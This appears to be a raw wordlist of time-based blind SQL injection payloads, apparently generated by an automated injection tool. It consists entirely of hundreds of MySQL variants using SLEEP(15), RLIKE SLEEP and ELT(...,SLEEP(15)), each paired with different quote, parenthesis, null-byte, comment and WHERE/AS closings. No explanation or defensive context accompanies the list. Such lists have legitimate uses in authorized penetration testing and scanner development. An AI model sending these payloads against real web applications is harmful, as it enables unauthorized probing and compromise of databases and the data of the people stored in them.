(,,("','".
'KBAC<'">nQHA
) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)
') AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)
' AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)
" AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)
) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (2378=2378
)) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((9354=9354
))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (((8189=8189
 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)
') AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ('areC'='areC
')) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (('Hvbn'='Hvbn
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((('ckxu'='ckxu
' AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND 'TlqH'='TlqH
') AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ('CqCY' LIKE 'CqCY
')) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (('FlaS' LIKE 'FlaS
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((('KQKN' LIKE 'KQKN
' AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND 'woFk' LIKE 'woFk
") AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ("Qyqa"="Qyqa
")) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (("JPyy"="JPyy
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((("VFuH"="VFuH
" AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND "dFGT"="dFGT
") AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ("bVWD" LIKE "bVWD
")) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (("YcgT" LIKE "YcgT
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((("HCtP" LIKE "HCtP
" AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND "jzOp" LIKE "jzOp
%') AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ('%'='
%')) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (('%'='
%'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((('%'='
%' AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND '%'='
%") AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ("%"="
%")) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (("%"="
%"))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((("%"="
%" AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND "%"="
%00') AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ('YIrI'='YIrI
%00')) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND (('nCIM'='nCIM
%00'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND ((('QofM'='QofM
%00' AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ) AND 'PciT'='PciT
 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- DsHu
 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)# rKWF
') WHERE 8763=8763 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
") WHERE 2161=2161 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
) WHERE 3923=3923 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
' WHERE 1012=1012 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
" WHERE 4178=4178 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
 WHERE 7112=7112 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
')) AS QijX WHERE 6781=6781 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
")) AS gbED WHERE 2118=2118 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
)) AS ubNe WHERE 5511=5511 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
') AS xnsW WHERE 2212=2212 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
") AS wIii WHERE 6451=6451 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
) AS tPfZ WHERE 7233=7233 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)-- 
'||(SELECT 'NgNc' FROM DUAL WHERE 6900=6900 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ))||'
'||(SELECT 'fNUq' WHERE 7654=7654 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ))||'
'+(SELECT kFBN WHERE 2865=2865 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ))+'
'+(SELECT 'bBdB' WHERE 6128=6128 AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ))+'
' IN BOOLEAN MODE) AND (SELECT * FROM (SELECT(SLEEP(15)))OUlZ)#
) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
') AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
' AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
" AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
)) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
')) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
") AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
")) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%') AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%')) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%'))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%' AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%") AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%")) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%"))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%" AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%00') AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%00')) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%00'))) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
%00' AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
') WHERE 6962=6962 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
") WHERE 8900=8900 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
) WHERE 2517=2517 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
' WHERE 2328=2328 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
" WHERE 9271=9271 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
 WHERE 7045=7045 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
')) AS eppE WHERE 1236=1236 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
")) AS pEBA WHERE 9056=9056 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
)) AS EiWN WHERE 7707=7707 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
') AS MPhH WHERE 7371=7371 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
") AS PDcH WHERE 2217=2217 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
) AS GXCD WHERE 1696=1696 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
'||(SELECT 'ayGH' FROM DUAL WHERE 8530=8530 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
'||(SELECT 'NIuK' WHERE 5087=5087 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
'+(SELECT OoxX WHERE 6418=6418 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
'+(SELECT 'dfin' WHERE 5064=5064 AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
' IN BOOLEAN MODE) AND (SELECT * FROM (SELECT(SLEEP(15)))GZlS)#
) AND SLEEP(15)
') AND SLEEP(15)
' AND SLEEP(15)
" AND SLEEP(15)
) AND SLEEP(15) AND (5751=5751
)) AND SLEEP(15) AND ((9094=9094
))) AND SLEEP(15) AND (((2599=2599
 AND SLEEP(15)
') AND SLEEP(15) AND ('BVTI'='BVTI
')) AND SLEEP(15) AND (('ftom'='ftom
'))) AND SLEEP(15) AND ((('YWHd'='YWHd
' AND SLEEP(15) AND 'aDMv'='aDMv
') AND SLEEP(15) AND ('qibE' LIKE 'qibE
')) AND SLEEP(15) AND (('YkCU' LIKE 'YkCU
'))) AND SLEEP(15) AND ((('NACl' LIKE 'NACl
' AND SLEEP(15) AND 'MfcJ' LIKE 'MfcJ
") AND SLEEP(15) AND ("zoRk"="zoRk
")) AND SLEEP(15) AND (("BbgR"="BbgR
"))) AND SLEEP(15) AND ((("TyDS"="TyDS
" AND SLEEP(15) AND "EkmA"="EkmA
") AND SLEEP(15) AND ("qECc" LIKE "qECc
")) AND SLEEP(15) AND (("NuUO" LIKE "NuUO
"))) AND SLEEP(15) AND ((("yBkH" LIKE "yBkH
" AND SLEEP(15) AND "aGVG" LIKE "aGVG
%') AND SLEEP(15) AND ('%'='
%')) AND SLEEP(15) AND (('%'='
%'))) AND SLEEP(15) AND ((('%'='
%' AND SLEEP(15) AND '%'='
%") AND SLEEP(15) AND ("%"="
%")) AND SLEEP(15) AND (("%"="
%"))) AND SLEEP(15) AND ((("%"="
%" AND SLEEP(15) AND "%"="
%00') AND SLEEP(15) AND ('VCmg'='VCmg
%00')) AND SLEEP(15) AND (('LpfI'='LpfI
%00'))) AND SLEEP(15) AND ((('VVHT'='VVHT
%00' AND SLEEP(15) AND 'qeXw'='qeXw
 AND SLEEP(15)-- XwwW
 AND SLEEP(15)# VTmV
') WHERE 4920=4920 AND SLEEP(15)-- 
") WHERE 6612=6612 AND SLEEP(15)-- 
) WHERE 4595=4595 AND SLEEP(15)-- 
' WHERE 2877=2877 AND SLEEP(15)-- 
" WHERE 9969=9969 AND SLEEP(15)-- 
 WHERE 7222=7222 AND SLEEP(15)-- 
')) AS fOAd WHERE 8433=8433 AND SLEEP(15)-- 
")) AS NHrG WHERE 5852=5852 AND SLEEP(15)-- 
)) AS BHdt WHERE 1516=1516 AND SLEEP(15)-- 
') AS FOFc WHERE 7270=7270 AND SLEEP(15)-- 
") AS DZFd WHERE 8100=8100 AND SLEEP(15)-- 
) AS dVcd WHERE 5217=5217 AND SLEEP(15)-- 
'||(SELECT 'sVeg' FROM DUAL WHERE 7939=7939 AND SLEEP(15))||'
'||(SELECT 'srYC' WHERE 4368=4368 AND SLEEP(15))||'
'+(SELECT vcOT WHERE 4951=4951 AND SLEEP(15))+'
'+(SELECT 'gutx' WHERE 7495=7495 AND SLEEP(15))+'
' IN BOOLEAN MODE) AND SLEEP(15)#
) AND SLEEP(15)#
') AND SLEEP(15)#
' AND SLEEP(15)#
" AND SLEEP(15)#
)) AND SLEEP(15)#
))) AND SLEEP(15)#
 AND SLEEP(15)#
')) AND SLEEP(15)#
'))) AND SLEEP(15)#
") AND SLEEP(15)#
")) AND SLEEP(15)#
"))) AND SLEEP(15)#
%') AND SLEEP(15)#
%')) AND SLEEP(15)#
%'))) AND SLEEP(15)#
%' AND SLEEP(15)#
%") AND SLEEP(15)#
%")) AND SLEEP(15)#
%"))) AND SLEEP(15)#
%" AND SLEEP(15)#
%00') AND SLEEP(15)#
%00')) AND SLEEP(15)#
%00'))) AND SLEEP(15)#
%00' AND SLEEP(15)#
') WHERE 9349=9349 AND SLEEP(15)#
") WHERE 7589=7589 AND SLEEP(15)#
) WHERE 6230=6230 AND SLEEP(15)#
' WHERE 4529=4529 AND SLEEP(15)#
" WHERE 6892=6892 AND SLEEP(15)#
 WHERE 8153=8153 AND SLEEP(15)#
')) AS FKij WHERE 5207=5207 AND SLEEP(15)#
")) AS pKIm WHERE 2425=2425 AND SLEEP(15)#
)) AS zWAs WHERE 7562=7562 AND SLEEP(15)#
') AS INGJ WHERE 8472=8472 AND SLEEP(15)#
") AS mSXj WHERE 6311=6311 AND SLEEP(15)#
) AS lGfz WHERE 2338=2338 AND SLEEP(15)#
'||(SELECT 'zWbk' FROM DUAL WHERE 1227=1227 AND SLEEP(15)#
'||(SELECT 'KGNw' WHERE 4284=4284 AND SLEEP(15)#
'+(SELECT ayIZ WHERE 6771=6771 AND SLEEP(15)#
'+(SELECT 'hhAK' WHERE 5626=5626 AND SLEEP(15)#
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (4744=4744
)) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((6384=6384
))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (((7300=7300
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ('iIpx'='iIpx
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (('RpRm'='RpRm
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((('ZWMa'='ZWMa
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND 'pLiP'='pLiP
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ('TOlh' LIKE 'TOlh
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (('oClG' LIKE 'oClG
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((('vqdI' LIKE 'vqdI
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND 'JxZg' LIKE 'JxZg
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ("ffKM"="ffKM
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (("VHGW"="VHGW
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((("AMWZ"="AMWZ
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND "IqCn"="IqCn
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ("WDur" LIKE "WDur
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (("dOEY" LIKE "dOEY
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((("NcTG" LIKE "NcTG
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND "YRuA" LIKE "YRuA
%') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ('%'='
%')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (('%'='
%'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((('%'='
%' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND '%'='
%") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ("%"="
%")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (("%"="
%"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((("%"="
%" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND "%"="
%00') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ('ulWy'='ulWy
%00')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND (('Zipe'='Zipe
%00'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND ((('BLLX'='BLLX
%00' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA) AND 'Jcbd'='Jcbd
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- BFyP
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)# IIlN
') WHERE 1844=1844 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
") WHERE 7705=7705 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
) WHERE 3836=3836 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
' WHERE 9008=9008 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
" WHERE 4600=4600 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
 WHERE 6445=6445 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
')) AS sKmL WHERE 8227=8227 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
")) AS VYDh WHERE 5513=5513 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
)) AS fYlO WHERE 8037=8037 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
') AS mUqg WHERE 7021=7021 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
") AS xYKS WHERE 2888=2888 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
) AS PxBz WHERE 2126=2126 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)-- 
'||(SELECT 'cOiq' FROM DUAL WHERE 5358=5358 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA))||'
'||(SELECT 'DKIV' WHERE 9744=9744 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA))||'
'+(SELECT PQrh WHERE 2818=2818 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA))+'
'+(SELECT 'eIZg' WHERE 2306=2306 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA))+'
' IN BOOLEAN MODE) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))oycA)#
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
)) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%00') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%00')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%00'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
%00' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
') WHERE 6384=6384 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
") WHERE 8434=8434 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
) WHERE 2825=2825 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
' WHERE 8788=8788 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
" WHERE 4685=4685 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
 WHERE 2949=2949 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
')) AS naVf WHERE 5022=5022 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
")) AS GjiA WHERE 6741=6741 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
)) AS PREk WHERE 5054=5054 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
') AS qeGO WHERE 3552=3552 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
") AS Rrif WHERE 4780=4780 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
) AS BNHZ WHERE 2553=2553 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
'||(SELECT 'Xdns' FROM DUAL WHERE 6610=6610 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
'||(SELECT 'ljUt' WHERE 3210=3210 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
'+(SELECT Fhnc WHERE 2527=2527 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
'+(SELECT 'VNzB' WHERE 1245=1245 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
' IN BOOLEAN MODE) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))VkUd)#
) RLIKE SLEEP(15)
') RLIKE SLEEP(15)
' RLIKE SLEEP(15)
" RLIKE SLEEP(15)
) RLIKE SLEEP(15) AND (7378=7378
)) RLIKE SLEEP(15) AND ((7160=7160
))) RLIKE SLEEP(15) AND (((4410=4410
 RLIKE SLEEP(15)
') RLIKE SLEEP(15) AND ('wLih'='wLih
')) RLIKE SLEEP(15) AND (('mSoz'='mSoz
'))) RLIKE SLEEP(15) AND ((('rTwC'='rTwC
' RLIKE SLEEP(15) AND 'QTgn'='QTgn
') RLIKE SLEEP(15) AND ('UCWm' LIKE 'UCWm
')) RLIKE SLEEP(15) AND (('KGuf' LIKE 'KGuf
'))) RLIKE SLEEP(15) AND ((('KRXv' LIKE 'KRXv
' RLIKE SLEEP(15) AND 'AFCw' LIKE 'AFCw
") RLIKE SLEEP(15) AND ("cNhc"="cNhc
")) RLIKE SLEEP(15) AND (("SbdR"="SbdR
"))) RLIKE SLEEP(15) AND ((("ajhD"="ajhD
" RLIKE SLEEP(15) AND "oSBb"="oSBb
") RLIKE SLEEP(15) AND ("HKJC" LIKE "HKJC
")) RLIKE SLEEP(15) AND (("Wwmv" LIKE "Wwmv
"))) RLIKE SLEEP(15) AND ((("xhSH" LIKE "xhSH
" RLIKE SLEEP(15) AND "EtEM" LIKE "EtEM
%') RLIKE SLEEP(15) AND ('%'='
%')) RLIKE SLEEP(15) AND (('%'='
%'))) RLIKE SLEEP(15) AND ((('%'='
%' RLIKE SLEEP(15) AND '%'='
%") RLIKE SLEEP(15) AND ("%"="
%")) RLIKE SLEEP(15) AND (("%"="
%"))) RLIKE SLEEP(15) AND ((("%"="
%" RLIKE SLEEP(15) AND "%"="
%00') RLIKE SLEEP(15) AND ('fbNT'='fbNT
%00')) RLIKE SLEEP(15) AND (('bNYP'='bNYP
%00'))) RLIKE SLEEP(15) AND ((('FetP'='FetP
%00' RLIKE SLEEP(15) AND 'YzcL'='YzcL
 RLIKE SLEEP(15)-- Pmxn
 RLIKE SLEEP(15)# huWW
') WHERE 4396=4396 RLIKE SLEEP(15)-- 
") WHERE 4165=4165 RLIKE SLEEP(15)-- 
) WHERE 1412=1412 RLIKE SLEEP(15)-- 
' WHERE 9833=9833 RLIKE SLEEP(15)-- 
" WHERE 8030=8030 RLIKE SLEEP(15)-- 
 WHERE 4190=4190 RLIKE SLEEP(15)-- 
')) AS bYoU WHERE 2603=2603 RLIKE SLEEP(15)-- 
")) AS PDnj WHERE 4348=4348 RLIKE SLEEP(15)-- 
)) AS AWOt WHERE 1988=1988 RLIKE SLEEP(15)-- 
') AS eKhL WHERE 6520=6520 RLIKE SLEEP(15)-- 
") AS DNVy WHERE 8601=8601 RLIKE SLEEP(15)-- 
) AS KdaL WHERE 4959=4959 RLIKE SLEEP(15)-- 
'||(SELECT 'cRQj' FROM DUAL WHERE 7136=7136 RLIKE SLEEP(15))||'
'||(SELECT 'bafv' WHERE 7808=7808 RLIKE SLEEP(15))||'
'+(SELECT etYB WHERE 9729=9729 RLIKE SLEEP(15))+'
'+(SELECT 'taMT' WHERE 9397=9397 RLIKE SLEEP(15))+'
' IN BOOLEAN MODE) RLIKE SLEEP(15)#
) RLIKE SLEEP(15)#
') RLIKE SLEEP(15)#
' RLIKE SLEEP(15)#
" RLIKE SLEEP(15)#
)) RLIKE SLEEP(15)#
))) RLIKE SLEEP(15)#
 RLIKE SLEEP(15)#
')) RLIKE SLEEP(15)#
'))) RLIKE SLEEP(15)#
") RLIKE SLEEP(15)#
")) RLIKE SLEEP(15)#
"))) RLIKE SLEEP(15)#
%') RLIKE SLEEP(15)#
%')) RLIKE SLEEP(15)#
%'))) RLIKE SLEEP(15)#
%' RLIKE SLEEP(15)#
%") RLIKE SLEEP(15)#
%")) RLIKE SLEEP(15)#
%"))) RLIKE SLEEP(15)#
%" RLIKE SLEEP(15)#
%00') RLIKE SLEEP(15)#
%00')) RLIKE SLEEP(15)#
%00'))) RLIKE SLEEP(15)#
%00' RLIKE SLEEP(15)#
') WHERE 5386=5386 RLIKE SLEEP(15)#
") WHERE 9280=9280 RLIKE SLEEP(15)#
) WHERE 6275=6275 RLIKE SLEEP(15)#
' WHERE 9278=9278 RLIKE SLEEP(15)#
" WHERE 4337=4337 RLIKE SLEEP(15)#
 WHERE 2991=2991 RLIKE SLEEP(15)#
')) AS oUEF WHERE 5386=5386 RLIKE SLEEP(15)#
")) AS MYbs WHERE 8297=8297 RLIKE SLEEP(15)#
)) AS oaZj WHERE 8336=8336 RLIKE SLEEP(15)#
') AS gskf WHERE 3308=3308 RLIKE SLEEP(15)#
") AS Jzgs WHERE 7053=7053 RLIKE SLEEP(15)#
) AS Klbj WHERE 1439=1439 RLIKE SLEEP(15)#
'||(SELECT 'uKLx' FROM DUAL WHERE 1680=1680 RLIKE SLEEP(15)#
'||(SELECT 'jsyC' WHERE 8717=8717 RLIKE SLEEP(15)#
'+(SELECT Olff WHERE 5771=5771 RLIKE SLEEP(15)#
'+(SELECT 'TFnq' WHERE 1900=1900 RLIKE SLEEP(15)#
) AND ELT(7941=7941,SLEEP(15))
') AND ELT(7941=7941,SLEEP(15))
' AND ELT(7941=7941,SLEEP(15))
" AND ELT(7941=7941,SLEEP(15))
) AND ELT(7941=7941,SLEEP(15)) AND (2871=2871
)) AND ELT(7941=7941,SLEEP(15)) AND ((6074=6074
))) AND ELT(7941=7941,SLEEP(15)) AND (((4176=4176
 AND ELT(7941=7941,SLEEP(15))
') AND ELT(7941=7941,SLEEP(15)) AND ('TdAA'='TdAA
')) AND ELT(7941=7941,SLEEP(15)) AND (('lujf'='lujf
'))) AND ELT(7941=7941,SLEEP(15)) AND ((('qrQL'='qrQL
' AND ELT(7941=7941,SLEEP(15)) AND 'HfSx'='HfSx
') AND ELT(7941=7941,SLEEP(15)) AND ('DxVh' LIKE 'DxVh
')) AND ELT(7941=7941,SLEEP(15)) AND (('FcFt' LIKE 'FcFt
'))) AND ELT(7941=7941,SLEEP(15)) AND ((('whDe' LIKE 'whDe
' AND ELT(7941=7941,SLEEP(15)) AND 'tfvd' LIKE 'tfvd
") AND ELT(7941=7941,SLEEP(15)) AND ("oOMX"="oOMX
")) AND ELT(7941=7941,SLEEP(15)) AND (("iina"="iina
"))) AND ELT(7941=7941,SLEEP(15)) AND ((("duKA"="duKA
" AND ELT(7941=7941,SLEEP(15)) AND "cgJm"="cgJm
") AND ELT(7941=7941,SLEEP(15)) AND ("HLbu" LIKE "HLbu
")) AND ELT(7941=7941,SLEEP(15)) AND (("EKAt" LIKE "EKAt
"))) AND ELT(7941=7941,SLEEP(15)) AND ((("kVRa" LIKE "kVRa
" AND ELT(7941=7941,SLEEP(15)) AND "nUEv" LIKE "nUEv
%') AND ELT(7941=7941,SLEEP(15)) AND ('%'='
%')) AND ELT(7941=7941,SLEEP(15)) AND (('%'='
%'))) AND ELT(7941=7941,SLEEP(15)) AND ((('%'='
%' AND ELT(7941=7941,SLEEP(15)) AND '%'='
%") AND ELT(7941=7941,SLEEP(15)) AND ("%"="
%")) AND ELT(7941=7941,SLEEP(15)) AND (("%"="
%"))) AND ELT(7941=7941,SLEEP(15)) AND ((("%"="
%" AND ELT(7941=7941,SLEEP(15)) AND "%"="
%00') AND ELT(7941=7941,SLEEP(15)) AND ('xCRd'='xCRd
%00')) AND ELT(7941=7941,SLEEP(15)) AND (('eWAM'='eWAM
%00'))) AND ELT(7941=7941,SLEEP(15)) AND ((('JKls'='JKls
%00' AND ELT(7941=7941,SLEEP(15)) AND 'fqms'='fqms
 AND ELT(7941=7941,SLEEP(15))-- GNlu
